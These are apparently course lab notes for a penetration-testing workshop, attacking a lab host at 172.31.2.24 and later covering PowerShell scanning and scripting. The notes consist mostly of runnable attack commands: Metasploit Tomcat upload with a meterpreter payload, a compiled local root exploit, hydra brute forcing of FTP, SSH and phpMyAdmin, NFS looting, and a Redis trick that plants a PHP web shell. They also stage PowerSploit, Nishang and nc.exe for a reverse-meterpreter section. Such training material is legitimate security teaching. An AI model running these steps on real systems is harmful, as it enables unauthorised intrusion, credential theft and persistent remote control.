4212
4213
4214
4215Attack steps:
4216-------------
4217
4218
4219Step 1: Ping sweep the target network
4220-------------------------------------
4221
4222
4223---------------------------Type This-----------------------------------
# host discovery only (-sP is the legacy spelling of -sn). Unprivileged, nmap
# uses TCP probes instead of ICMP/ARP (see its host-discovery docs), so hosts
# that drop those probes are missed.
nmap -sP 172.31.2.0/24
4225-----------------------------------------------------------------------
4226
4227Found 5 hosts:
4228172.31.2.24
4229172.31.2.64
4230172.31.2.117
4231172.31.2.217
4232172.31.2.238
4233
4234Step 2: Port scan target system
4235-------------------------------
4236
4237
4238---------------------------Type This-----------------------------------
# version detection on nmap's default top-1000 TCP ports only. Services on
# other ports (e.g. the SSH on 1322 and Redis on 6379 used later) may not
# appear without -p- or an explicit -p list.
sudo nmap -sV 172.31.2.24
4240-----------------------------------------------------------------------
4241
4242
4243
4244
4245
4246
4247Step 3: Vulnerability Scan the webserver
4248----------------------------------------
4249
4250
4251---------------------------Type This-----------------------------------
cd ~/toolz/

# wildcard delete inside ~/toolz: anything starting with "nikto" goes
rm -rf nikto*

# unpinned clone of master; pin a tag/commit if you need reproducible results
git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

# default port 80 only; the later "Using Nikto" section repeats this for 8080/8081/9000
perl nikto.pl -h 172.31.2.24
4261-----------------------------------------------------------------------
4262
4263
4264
4265
4266
4267Step 4: Run dirbuster or similar directory bruteforce tool against the target
4268-----------------------------------------------------------------------------
4269
4270
4271---------------------------Type This-----------------------------------
# Webr00t.pl is an old Perl CGI/directory scanner from packetstorm; it is
# fetched and executed as-is, so glance through it first
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

# -v prints every request; the grep hides the 404s so only existing paths remain
perl Webr00t.pl -h 172.31.2.24 -v | grep -v "404 Not Found"
4275-----------------------------------------------------------------------
4276
4277
4278
4279
4280Step 5: Browse the web site to look for clues
4281---------------------------------------------
Since no glaring vulnerabilities were found with the scanner, we start by just looking around the website itself.
4283
4284
4285
4286###############
4287# Using Nikto #
4288###############
4289
4290---------------------------Type This-----------------------------------
4291
cd ~/toolz/

# same setup as Step 3 above (wildcard delete + unpinned clone of master)
rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

# one run per web port found in the port scan; host:port syntax selects the port
perl nikto.pl -h 172.31.2.24

perl nikto.pl -h 172.31.2.24:8080

perl nikto.pl -h 172.31.2.24:8081

perl nikto.pl -h 172.31.2.24:9000
4307-----------------------------------------------------------------------
4308
4309
4310
4311
4312####################
4313# Using Metasploit #
4314####################
4315
4316---------------------------Type This-----------------------------------
4317
cd ~/toolz/metasploit

./msfconsole

# banner grab of the web service on 8080 (reports server header / version)
use auxiliary/scanner/http/http_version

set RHOSTS 172.31.2.24

set RPORT 8080

run


-------------------------------

# enumerates the default Tomcat application paths (manager, docs, examples ...)
use auxiliary/scanner/http/tomcat_enum

set RHOSTS 172.31.2.24

set RPORT 8080

run
4340
4341
4342
4343
4344
4345####################
4346# Attacking Tomcat #
4347####################
4348
4349---------------------------Type This-----------------------------------
4350
use auxiliary/scanner/http/http_version

set RHOSTS 172.31.2.24

set RPORT 8080

run


-------------------------------


use auxiliary/scanner/http/tomcat_mgr_login

set USERNAME tomcat

# NOTE(review): USERPASS_FILE expects "user password" pairs, one pair per
# line; list.txt (built earlier) holds single words. With USERNAME set,
# PASS_FILE is the option that takes a plain password list -- check
# `show options`.
set USERPASS_FILE /home/strategicsec/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 172.31.2.24

set RPORT 8080

run


-------------------------------

use exploit/multi/http/tomcat_mgr_upload

set HttpUsername tomcat

set HttpPassword tomcat

# RHOST is the older option name; recent versions use RHOSTS (RHOST is usually
# still accepted as an alias)
set RHOST 172.31.2.24

set RPORT 8080

# NOTE(review): this module's path option is TARGETURI (default /manager);
# PATH is not one of its options, so this line likely sets an unused value --
# verify with `show options`.
set PATH /manager/html

# bind payload: the deployed WAR listens on the target and msf connects to it,
# so the target port must be reachable inbound (use reverse_tcp otherwise)
set PAYLOAD linux/x86/meterpreter/bind_tcp

exploit


run post/linux/gather/checkvm

run post/linux/gather/enum_configs

run post/linux/gather/enum_protections

run post/linux/gather/enum_system

run post/linux/gather/enum_users_history

# reads /etc/shadow, so it fails while the session runs as the tomcat user;
# rerun it after the privilege escalation below
run post/linux/gather/hashdump

shell

/bin/bash

id

uname -a

dpkg -l

cd /tmp

pwd


# '>>' appends: if /tmp/exploit.c already exists the paste is added to it --
# use '>' (or remove it first) to get a clean file. 'out' is the here-doc
# terminator.
cat >> exploit.c << out

**************paste in the content from here *****************
# EDB-ID 39166 is a Linux local privilege-escalation exploit: confirm it
# matches the kernel/distro shown by `uname -a` before compiling it. The
# 'platforms/' path is the old exploit-database layout; if it 404s, look for
# exploits/linux/local/39166.c in the current repo.
https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...


gcc -o boom exploit.c

./boom

# should now report uid=0 if the exploit worked
id


-------------------------------


# same manager brute force with hydra: -e ns also tries an empty password and
# the username as password; -s 8080 sets the port, -vV prints every attempt
hydra -l tomcat -P /home/strategicsec/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
4446
4447
4448#################
4449# Attacking FTP #
4450#################
4451
4452---------------------------Type This-----------------------------------
4453
# NOTE(review): -p25 is SMTP's port; in this lab the FTP service evidently runs
# there (the hydra line below also uses -s 25). The NSE scripts check for
# anonymous login, the FTP bounce attack and the known backdoored
# ProFTPD/vsftpd builds.
sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24

cd ~/toolz/hydra

# user 'admin' against the wordlist; -u loops users first (one password
# across all users before the next), -s 25 is the port
hydra -l admin -P /home/strategicsec/list.txt -u -s 25 172.31.2.24 ftp

# interactive ftp session: 'open host' connects to port 21 by default -- give
# the port too ("open 172.31.2.24 25") if the service really is on 25. The
# two 'admin' lines are the username and password typed at the prompts.
ftp
open 172.31.2.24
admin
admin
pwd
ls -lah

# does the server let you list outside the FTP root?
ls ../../
4468
4469
4470#################
4471# Attacking SSH #
4472#################
4473
4474---------------------------Type This-----------------------------------
4475
cd ~/toolz/hydra

# every name in list.txt as both user and password (13 x 13 attempts); -u
# loops users first, which spreads attempts across accounts and is gentler
# on per-account lockout policies. Still noisy: expect it in the auth log.
hydra -L /home/strategicsec/list.txt -P /home/strategicsec/list.txt -u -s 1322 172.31.2.24 ssh

# log in with the hit (admin) on the non-standard port
ssh -p 1322 admin@172.31.2.24




cd ~/toolz/metasploit

./msfconsole

# NOTE(review): the SSH user-enumeration module is named ssh_enumusers in
# current Metasploit; if this `use` fails, run `search ssh enum`
use auxiliary/scanner/ssh/ssh_users

set USER_FILE /home/strategicsec/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 172.31.2.24

set RPORT 1322

run





# same user/password list as hydra; a successful login opens a session
use auxiliary/scanner/ssh/ssh_login

set USER_FILE /home/strategicsec/list.txt

set PASS_FILE /home/strategicsec/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 172.31.2.24

set RPORT 1322

run


sessions -l

# -u: upgrade the plain shell session to a meterpreter session
sessions -u 1

sessions -i 1

id
4527
4528
4529
4530########################
4531# Attacking phpMyAdmin #
4532########################
4533****** This section isn't finished ******
4534
4535---------------------------Type This-----------------------------------
4536
# phpMyAdmin login brute force: hydra POSTs to /phpMyAdmin/index.php with
# ^USER^/^PASS^ substituted and treats a response containing
# "information_schema" (the S= condition) as success; -e n also tries an
# empty password
hydra -l root -P /home/strategicsec/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
4538-----------------------------------------------------------------------
4539
4540****** This section isn't finished ******
4541
4542Google is your friend hahahahahahahah........
4543
4544---------------------------Type This-----------------------------------
4545
cd ~

# old third-party phpMyAdmin brute-forcer pulled from a mirror of the darkc0de
# archive: review it before running it on your box
wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py

# the note records that it reported a wrong password here, so verify any hit
# by logging in manually rather than trusting the tool's output
python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
4551
4552-----------------------------------------------------------------------
4553
4554
4555
4556
4557
4558####################
4559# Attacking Joomla #
4560####################
4561
4562---------------------------Type This-----------------------------------
4563
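cd ~/toolz/metasploit

./msfconsole

# (was "use use ..."; the doubled keyword made msfconsole fail to load the module)
use auxiliary/scanner/http/joomla_plugins

set RHOSTS 172.31.2.24

set RPORT 8080

run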
4575
4576
4577****** This section isn't finished ******
4578Google is your friend hahahahahahahah........
4579
4580#####################
4581# Attacking Jenkins #
4582#####################
4583
4584
4585****** This section isn't finished ******
4586Google is your friend hahahahahahahah........
4587
4588#################
4589# Attacking NFS #
4590#################
4591
4592---------------------------Type This-----------------------------------
4593
sudo apt install -y rpcbind nfs-common
 strategicsec

# lists the RPC services (nfs, mountd ...) registered on the target
rpcinfo -s 172.31.2.24

# lists exported paths and which clients may mount them ("*" = anyone)
showmount -e 172.31.2.24

# mounting NFS needs root; the lines up to 'exit' run in this root shell
sudo /bin/bash

mkdir /tmp/nfs

# -o nolock: skip the NFS lock manager (fine for a read-only look around)
mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock

ls /tmp/nfs

# copied as root, so the copy is root-owned; chown it if later steps complain
cp /tmp/nfs/backup.tar.bz2.zip /home/strategicsec

# lazy unmount: detach now, clean up once nothing uses it
umount -l /tmp/nfs

# back to the normal user (the following commands assume cwd is ~)
exit

sudo apt-cache search fcrackzip

sudo apt-get install -y fcrackzip

# no -b/-D given, so fcrackzip's default mode; -u actually tries to unzip with
# each candidate so only a working password is reported. The password found
# below (aaaaaa) is in ~/list.txt, so `fcrackzip -u -D -p ~/list.txt ...`
# would get there faster.
fcrackzip -u backup.tar.bz2.zip

unzip -P aaaaaa backup.tar.bz2.zip

tar jxf backup.tar.bz2
4624
4625
4626###################
4627# Attacking Redis #
4628###################
4629
4630---------------------------Type This-----------------------------------
4631
# the redis-info NSE script dumps INFO output if the instance answers without auth
sudo nmap -p 6379 --script=redis-info 172.31.2.24
 strategicsec

sudo apt-get install -y redis-tools


# no -a / AUTH: the instance is assumed to be unauthenticated and exposed on the
# network, which is the misconfiguration this whole section abuses
redis-cli -h 172.31.2.24

# point the RDB dump at the web root (needs the redis user to have write access there)
CONFIG SET dir /var/www/html/main

CONFIG GET dir

# name the dump file so the web server executes it as PHP
config set dbfilename boom.php

CONFIG GET dbfilename

# the RDB file wraps this string in binary headers; PHP ignores everything
# outside the <?php ... ?> tags, so the web shell still runs
SET cmd "<?php system($_GET['joe']); ?>"

# write the dump (in the background) -- this is what drops boom.php
BGSAVE

# NOTE(review): dir was set to .../html/main, so unless that directory is the
# DocumentRoot the file is reachable at /main/boom.php rather than /boom.php
http://172.31.2.24/boom.php

# unauthenticated RCE as the web-server user: remove boom.php and restore
# dir/dbfilename (CONFIG SET ... dump.rdb) when the lab is done
http://172.31.2.24/boom.php?joe=id
4655
4656
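# Pad a public key with blank lines so it survives being written inside an RDB
# dump (the trailing `/.ssh"` in the original line was a typo that made the
# redirect target invalid). The rest of this technique -- loading foo.txt into
# a Redis key and pointing dir/dbfilename at the target user's
# .ssh/authorized_keys, as done above for boom.php -- is not written out in
# these notes (section marked unfinished).
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt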
4658
4659
4660
4661****** This section isn't finished ******
4662Google is your friend hahahahahahahah........
4663
cd ~/toolz/metasploit

./msfconsole

# pushes a local file onto the Redis server (the module name suggests the same
# dir/dbfilename trick used above for boom.php)
use auxiliary/scanner/redis/file_upload

set RHOSTS 172.31.2.24

# LocalFile is left without a value in these notes; it needs the path of the
# file to upload (plus the remote path options) -- check `show options`
set LocalFile
4673
4674****** This section isn't finished ******
4675
4676
4677
4678#######################
4679# VMs for this course #
4680#######################
4681https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
4682 username: workshop
4683 password: password
4684
4685https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
4686user: infosecaddicts
4687pass: infosecaddicts
4688
4689You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
4690
4691You'll need to create directory in the Win7 VM called "c:\ps"
4692
4693In this file you will also need to change the text '192.168.150.129' to the IP address of your Ubuntu host.
4694
4695
4696
4697########################################
4698# Basic Network Commands in PowerShell #
4699########################################
4700
4701Reference:
4702https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
4703
4704
4705###################
4706# Pentester Tasks #
4707###################
4708Reference:
4709http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
4710
4711
4712Listing IPs
4713-----------
One of the typical ways of working with IP addresses in scripts is to fix the first three octets and increment the last one
4715
4716------------------------Type This------------------------------
# Print 192.168.150.1 .. 192.168.150.255 by fixing the first three octets and
# iterating the last one (the original spelt the variable "$octect").
$octet = "192.168.150."
foreach ($last in 1..255) { Write-Host "$octet$last" }
4720---------------------------------------------------------------
4721
4722
4723Ping Sweep
4724------------------------------------------------------
4725PowerShell provides several methods for doing Ping
4726Test-Connection cmdlet
4727Creation of a WMI Object
4728.Net System.Net.NetworkInformation.Ping Object
4729------------------------------------------------------
4730
4731
4732------------------------Type This------------------------------
# Emit every dotted-quad IPv4 address from $start to $end inclusive.
# IPAddress.Address holds the bytes in network order, so each address is
# byte-reversed before reading it as an integer, counted up, and reversed
# back for printing. (.Address is marked obsolete in newer .NET but still
# works for IPv4.)
function New-IPRange ($start, $end) {
$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
[Array]::Reverse($ip1)
$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address

$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
[Array]::Reverse($ip2)
$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address

# walk the integer range and turn each value back into dotted notation
for ($x=$ip1; $x -le $ip2; $x++) {
$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
[Array]::Reverse($ip)
$ip -join '.'
}
}
# one ICMP echo per host with a 100 ms timeout, sequentially; only replies with
# Status "Success" are kept, so hosts that block ICMP are silently absent
$ping = New-Object System.Net.NetworkInformation.Ping
New-IPRange 192.168.150.1 192.168.150.150 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"}
4750---------------------------------------------------------------
4751
4752
4753Reverse Lookups
4754---------------
For reverse lookups with the .NET class, use the [System.Net.Dns]::GetHostEntry(IP) method; it returns a System.Net.IPHostEntry.
4756
4757
4758
4759Forward Lookups
4760---------------
4761
4762------------------------Type This------------------------------
# forward lookup: returns the IPAddress[] (A and AAAA records) the resolver gives for the name
[System.Net.Dns]::GetHostAddresses("www.google.com")
4764---------------------------------------------------------------
4765
4766
4767Port Scans
4768----------
To test whether a port is open on a remote host from PowerShell, the simplest method is the .NET wrapper it provides around the Windows Sockets library:
4770For TCP the .Net System.Net.Sockets.TcpClient
4771For UDP the .Net System.Net.Sockets.UdpClient
4772
4773
4774
4775
4776TCP Scan
4777--------
4778
4779------------------------Type This------------------------------
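# Connect-scan a handful of TCP ports on $target. A completed handshake means
# "Open"; a refused or timed-out connect (the constructor throws) means
# "Closed". Full connects like these show up in the target's service logs.
$ports = 22, 80, 443, 3389
$target = "192.168.150.129"
foreach ($i in $ports) {
    $socket = $NULL
    try {
        $socket = New-Object System.Net.Sockets.TCPClient($target, $i)
    } catch {}
    # "${target}:$i" -- the braces are required: "$target:$i" is parsed as a
    # scope/drive-qualified variable name and fails with "':' was not
    # followed by a valid variable name character".
    if ($socket -eq $NULL) {
        Write-Output "${target}:$i - Closed"
    } else {
        Write-Output "${target}:$i - Open"
        # release the connection instead of leaving it to the GC
        $socket.Close()
        $socket = $NULL
    }
}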
4792---------------------------------------------------------------
4793
4794
4795
4796
4797##########################
4798# Parsing Nmap XML Files #
4799##########################
4800If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
4801https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip
4802
4803
4804
4805
4806Run Powershell as administrator
4807------------------------Type This------------------------------
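cd C:\

Get-ExecutionPolicy
# The original line used an en-dash ("–Force"), which PowerShell does not
# accept as a parameter switch; it must be an ASCII hyphen. Note that
# Unrestricted -Force changes the machine-wide policy for good: prefer
# `Set-ExecutionPolicy Bypass -Scope Process -Force` (current session only)
# or `Unblock-File .\parse-nmap.ps1` for the downloaded scripts, where your
# PowerShell version supports them.
Set-ExecutionPolicy Unrestricted -Force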
4812---------------------------------------------------------------
4813
4814
4815Parse nmap XML
4816------------------------Type This------------------------------
# parse-nmap.ps1 (from the lab zip) turns an nmap -oX file into one object per host
.\parse-nmap.ps1 samplescan.xml
4818---------------------------------------------------------------
4819
4820
4821Process all XML files
4822------------------------Type This------------------------------
# wildcard: every .xml in the current directory is parsed in turn
.\parse-nmap.ps1 *.xml
4824---------------------------------------------------------------
4825
4826Piping also works
4827------------------------Type This------------------------------
# the script also accepts file objects from the pipeline
dir *.xml | .\parse-nmap.ps1
4829---------------------------------------------------------------
4830
4831Advanced parsing with filtering conditions
4832------------------------Type This------------------------------
# -like is a case-insensitive wildcard match on the OS guess column
.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
4834---------------------------------------------------------------
4835
4836
4837More parsing
4838------------------------Type This------------------------------
# NOTE(review): a substring match -- "*open:tcp:22*" also matches ports such as
# 220 or 2222 if the Ports field lists them; anchor on the delimiter that
# follows the port number in the script's output format if precision matters
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
4840---------------------------------------------------------------
4841
4842Parsing with match and multiple conditions
4843------------------------Type This------------------------------
# regex alternation; like the -like filter above it is a substring match, so
# "open:tcp:80" also matches 8080/8000-style entries
.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
4845---------------------------------------------------------------
4846
4847
4848CSV Export
4849------------------------Type This------------------------------
# -outputdelimiter " " separates port entries with spaces so the CSV stays
# readable; the "open:tcp:80" match is still a substring match (see above)
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
4851---------------------------------------------------------------
4852
4853Import Data from CSV
4854------------------------Type This------------------------------
# round-trip through CSV gives plain string properties back; filter by subnet and port
$data = import-csv weblisteners.csv
$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
4857---------------------------------------------------------------
4858
4859
4860Export to HTML
4861------------------------Type This------------------------------
# ConvertTo-Html does not escape the OS/hostname strings specially beyond
# HTML encoding; fine for a local report, don't serve it as-is
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
4863---------------------------------------------------------------
4864
4865
4866########################################
4867# Parsing Nessus scans with PowerShell #
4868########################################
4869If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
4870https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip
4871
4872
4873
4874Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
4875------------------------Type This------------------------------
# each CSV row becomes an object; Get-Member lists the column names as properties
Import-Csv C:\class_nessus.csv | Get-Member
4877---------------------------------------------------------------
4878
4879filter the objects:
4880
4881------------------------Type This------------------------------
# -eq is case-insensitive, so "High" in the Nessus export matches "high"
Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"}
4883---------------------------------------------------------------
4884
4885use the Select-Object cmdlet and only get unique entries:
4886------------------------Type This------------------------------
# distinct hosts with at least one high finding
Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique

# everything rated high/medium/low (drops "None"/info rows), shown in a grid window
Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
4890------------------------Type This------------------------------
4891
4892ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
4893------------------------Type This------------------------------
# same filter written out as an HTML list report
Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
4895---------------------------------------------------------------
4896
4897
4898
4899
4900
4901
4902############################################
4903# Introduction to scripting and toolmaking #
4904############################################
4905https://www.youtube.com/watch?v=usiqXcWb978
4906
4907Start the ISE
4908
4909
4910CTRL+R
4911
4912
4913
4914
4915
4916
4917
4918
# dump the Application event log to the console (Get-EventLog reads the classic
# logs; Get-WinEvent is its successor on newer systems, but this is what the lab uses)
Get-EventLog -LogName application
4920
4921
4922------------------------------------------------------------------------------------------------
4923--- Now run the script ---
4924
4925---------------------------Type This-----------------------------------
4926
4927.\GrabLogs.ps1
4928
4929
4930------------------------------------------------------------------------------------------------
4931
4932
4933
# GrabLogs.ps1, first version: log name hard-coded, exported as CLIXML into a
# fixed folder under the Workshop profile (the folder must already exist)
$LogName="application"
Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
4936
4937
4938
4939
4940--- Now run the script ---
4941
4942---------------------------Type This-----------------------------------
4943
4944.\GrabLogs.ps1
4945
4946
4947------------------------------------------------------------------------------------------------
4948
4949
# second version: the log name becomes a parameter with the same default, so
# `.\GrabLogs.ps1 -LogName system` works. $LogName is used verbatim in the
# output path, so only trusted callers should pass arguments.
param(
    $LogName="application"
)
Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
4954
4955
4956
4957--- Now run the script ---
4958
4959.\GrabLogs.ps1
4960
4961
4962------------------------------------------------------------------------------------------------
4963--- Now run the script ---
4964
4965.\GrabLogs.ps1 -L[ TAB Key ]
4966
4967.\GrabLogs.ps1 -LogName (you should now see LogName spelled out)
4968
4969
4970.\GrabLogs.ps1 -LogName system
4971
4972
4973------------------------------------------------------------------------------------------------
4974
4975
4976
# third version: a second parameter, $Quantico, is declared but never used --
# it only exists to show tab completion of parameter names
param(
    $LogName="application",
    $Quantico
)
Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml
4982
4983
4984
4985------------------------------------------------------------------------------------------------
4986--- Now run the script ---
4987
4988.\GrabLogs.ps1 -Q[ TAB Key ]
4989
4990.\GrabLogs.ps1 -Quantico (you should now see Quantico spelled out)
4991
4992
4993
4994
4995------------------------------------------------------------------------------------------------
4996--- Now get help on the script ---
4997
4998get-help .\GrabLogs.ps1
4999GrabLogs.ps1 [[-LogName] <Object>] [[-Quantico] <Object>]
5000
5001
5002
5003
5004------------------------------------------------------------------------------------------------
# GrabLogs.ps1 (step 4): -LogName is typed as [string], which is what
# Get-Help now shows in the syntax line (<String> instead of <Object>).
param(
    [string] $LogName = 'application',
    $Quantico
)
# -Quantico is still unused; only -LogName drives the export.
Get-EventLog -LogName $LogName | Export-Clixml -Path "C:\Users\Workshop\Desktop\Scripts\$LogName.xml"
5010
5011
5012
5013------------------------------------------------------------------------------------------------
5014--- Now get help on the script ---
5015
5016get-help .\GrabLogs.ps1
5017GrabLogs.ps1 [[-LogName] <String>] [[-Quantico] <Object>]
5018
5019
5020
5021
5022------------------------------------------------------------------------------------------------
# GrabLogs.ps1 (step 5): -LogName is typed as [string[]] so Get-Help shows
# <String[]>. NOTE(review): only the help output is the point of this step;
# if several names were actually passed, the "$LogName.xml" expansion would
# join them with a space into one file name, and Get-EventLog -LogName takes a
# single name — confirm before relying on the array type.
param(
    [string[]] $LogName = 'application',
    $Quantico
)
Get-EventLog -LogName $LogName | Export-Clixml -Path "C:\Users\Workshop\Desktop\Scripts\$LogName.xml"
5028
5029
5030
5031------------------------------------------------------------------------------------------------
5032--- Now get help on the script ---
5033
5034get-help .\GrabLogs.ps1
5035GrabLogs.ps1 [[-LogName] <String[]>] [[-Quantico] <Object>]
5036
5037
5038
5039------------------------------------------------------------------------------------------------
# GrabLogs.ps1 (step 6): [CmdletBinding()] turns the script into an advanced
# script, and Mandatory=$True makes PowerShell prompt for -LogName when it is
# omitted (there is no default any more).
[CmdletBinding()]
param(
    [Parameter(Mandatory = $True)]
    $LogName
)
# Serialise the requested log to CLIXML; the file name follows the log name.
Get-EventLog -LogName $LogName | Export-Clixml -Path "C:\Users\Workshop\Desktop\Scripts\$LogName.xml"
5046
5047
5048
5049------------------------------------------------------------------------------------------------
5050--- Now run the script ---
5051
5052.\GrabLogs.ps1
5053
5054
5055
5056
5057
5058------------------------------------------------------------------------------------------------
# GrabLogs.ps1 (step 6, repeated): advanced-script form where -LogName is
# mandatory and has no default, so running it without arguments prompts.
[CmdletBinding()]
param(
    [Parameter(Mandatory = $True)] $LogName
)
# Output file is named after the log, under the workshop Scripts folder.
$OutFile = "C:\Users\Workshop\Desktop\Scripts\$LogName.xml"
Get-EventLog -LogName $LogName | Export-Clixml -Path $OutFile
5065
5066
5067
5068
5069
5070------------------------------------------------------------------------------------------------
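<#
.SYNOPSIS
Exports a Windows event log to a CLIXML file.

.DESCRIPTION
Reads every entry of the event log named by -LogName with Get-EventLog and
serialises it with Export-Clixml to C:\Users\Workshop\Desktop\Scripts\<LogName>.xml.
Get-EventLog exists in Windows PowerShell only; on PowerShell 7 use Get-WinEvent.

.PARAMETER LogName
Name of the event log to export (for example application, system or security).
Mandatory; PowerShell prompts for it when it is omitted.

.EXAMPLE
.\GrabLogs.ps1 -LogName security
#>
[CmdletBinding()]
param(
    [Parameter(Mandatory = $True)]
    $LogName
)
# The output file name follows the log name, e.g. security.xml.
Get-EventLog -LogName $LogName | Export-Clixml -Path "C:\Users\Workshop\Desktop\Scripts\$LogName.xml"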
5097
5098
5099
5100
5101------------------------------------------------------------------------------------------------
5102--- Now get help on the script ---
5103
5104get-help .\GrabLogs.ps1
5105
5106
5107
5108
5109
5110
5111------------------------------------------------------------------------------------------------
5112--- Now get help on the script ---
5113get-help .\GrabLogs.ps1 -full
5114
5115
5116
5117
5118
5119
5120
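<#
.SYNOPSIS
Exports a Windows event log to a CLIXML file.

.DESCRIPTION
Reads every entry of the event log named by -LogName with Get-EventLog and
serialises it with Export-Clixml to C:\Users\Workshop\Desktop\Scripts\<LogName>.xml.
Get-EventLog exists in Windows PowerShell only; on PowerShell 7 use Get-WinEvent.

.PARAMETER LogName
Name of the event log to export (for example application, system or security).
Mandatory; PowerShell prompts for it when it is omitted.

.EXAMPLE
Get-GrabLogs -LogName security
#>
function Get-GrabLogs {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $True)]
        $LogName
    )
    # The output file name follows the log name, e.g. security.xml.
    Get-EventLog -LogName $LogName | Export-Clixml -Path "C:\Users\Workshop\Desktop\Scripts\$LogName.xml"
}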
5149
5150####################################################
5151# Running Powershell From A Command Prompt #
5152# Using Powersploit & Nishang #
5153####################################################
5154
5155COMMAND & 1 PARAMETER SYNTAX:
5156 powershell -command "& {&'some-command' someParam}"
5157
5158
5159
5160MULTIPLE COMMAND & PARAMETER SYNTAX
5161 powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"
5162
5163
5164
5165Tools to download to the web root (/var/www) of your infosecaddicts-Ubuntu-VM:
5166git clone https://github.com/mattifestation/PowerSploit.git
5167git clone https://github.com/samratashok/nishang
5168
5169From the infosecaddicts home directory, copy nc.exe to the /var/www/ folder
5170
5171user:infosecaddicts
5172pass:infosecaddicts
5173
5174------------------------Type This------------------------------
# Stage the Windows-side tools on the Ubuntu VM's web server.
cd ~
# nc.exe is copied to /var/www/ ...
sudo cp nc.exe /var/www/

# ... while the PowerShell tool collections are cloned under /var/www/html/.
# NOTE(review): depending on which directory the web server actually serves,
# one of the two locations may not be reachable over HTTP — confirm the document root.
cd /var/www/html/
sudo git clone https://github.com/samratashok/nishang
sudo git clone https://github.com/mattifestation/PowerSploit
5181
5182
5183********************************** Simple Ping Sweep **********************************
REM Ping sweep of 192.168.150.50-100: one ICMP echo per host via Test-Connection,
REM printing "<ip>: True" or "<ip>: False" per address (-quiet yields a boolean).
REM The \"" sequences are quote escaping for the inner PowerShell string when the
REM line is launched from cmd.exe; type it exactly as shown.
powershell -command "50..100 | % {\""192.168.150.$($_): $(Test-Connection -count 1 -comp 192.168.150.$($_) -quiet)\""}"
5185
5186
5187
5188
5189
5190********************************** Simple Port 445 Sweep **********************************
REM TCP connect sweep of port 445 across 192.168.150.1-255: the address is printed
REM only when Connect() succeeds; a failed connect raises an error that 2>$null
REM discards. NOTE(review): the TcpClient is never closed or disposed, so each
REM successful connection presumably stays open until the process exits.
powershell -command "1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.150.$_\"",445)) \""192.168.150.$_\""} 2>$null"
5192
5193
5194
5195
5196
5197
5198********************************** Simple Port Scan **********************************
REM TCP connect scan of ports 1-1024 on one host; replace XX with the last octet
REM of the host before running. Prints "<port> is open" for each port where
REM Connect() succeeds; failed connects are discarded by 2>$null.
REM NOTE(review): the TcpClient objects are never closed or disposed.
powershell -command "1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.150.XX\"",$_)) \""$_ is open\""} 2>$null"
5200
5201
5202
5203
5204
5205
5206********************************** Powershell Download & Execute Reverse Meterpreter **********************************
5207From the Ubuntu host, change to the Metasploit folder
# Start a Metasploit listener on the Ubuntu host for the reverse HTTPS session
# that the PowerShell one-liner further down calls back to.
